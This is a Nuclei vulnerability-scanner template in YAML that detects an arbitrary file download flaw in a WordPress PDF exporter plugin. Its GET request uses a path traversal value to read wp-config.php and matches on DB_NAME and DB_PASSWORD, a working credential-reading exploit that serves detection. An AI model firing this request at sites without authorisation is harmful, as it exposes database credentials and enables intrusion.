nuclei-templates/vulnerabilities/wordpress/aspose-pdf-file-download.yaml

30 lines
796 B
YAML

id: aspose-pdf-file-download
info:
name: WordPress Aspose PDF Exporter File Download
author: 0x_Akoko
severity: high
description: The Aspose.psf Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
reference:
- https://packetstormsecurity.com/files/131161
- https://wordpress.org/plugins/aspose-pdf-exporter
tags: wordpress,wp-plugin,lfi,aspose
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200